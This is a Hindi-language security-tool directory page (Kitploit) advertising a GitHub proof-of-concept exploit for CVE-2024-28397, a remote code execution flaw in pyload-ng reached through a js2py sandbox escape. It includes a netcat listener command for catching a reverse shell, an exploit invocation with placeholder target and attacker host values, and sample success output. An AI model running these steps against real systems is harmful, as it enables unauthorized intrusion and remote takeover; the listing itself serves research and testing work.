Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

CVE-2024-28397 के लिए PoC एक्सप्लॉइट – js2py सैंडबॉक्स एस्केप के माध्यम से pyload-ng में दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
1 महीना पहलेअभी तक समीक्षित नहीं

रिमोट कोड एक्ज़ीक्यूशन – CVE-2024-28397 (pyload-ng / js2py)

इस रिपॉज़िटरी में CVE-2024-28397 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो pyload-ng को प्रभावित करने वाली एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो js2py के असुरक्षित उपयोग के कारण होती है।

अस्वीकरण:
यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है।
इसका उपयोग उन सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
लेखक इस कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।


भेद्यता विवरण

  • CVE आईडी: CVE-2024-28397
  • घटक: pyload-ng में js2py
  • प्रभाव: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • हमला वेक्टर: दुर्भावनापूर्ण JS पेलोड js2py सैंडबॉक्स से बाहर निकलकर मनमाना सिस्टम कमांड निष्पादित करता है।

आवश्यकताएँ और सेटअप

आपको Python 3.x, requests लाइब्रेरी, और रिवर्स शेल पकड़ने के लिए netcat की आवश्यकता होगी।

  • लक्ष्य → भेद्य pyload-ng इंस्टेंस, जिसमें /run_code एंडपॉइंट एक्सेसिबल हो

लिसनर → एक्सप्लॉइट चलाने से पहले शुरू करें:

nc -lvnp 4444

उपयोग:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

उदाहरण आउटपुट:

  • [+] पंजीकरण सफल!
  • [+] लॉगिन सफल
  • [+] एक्सप्लॉइट काम कर गया
टूल डाउनलोड करें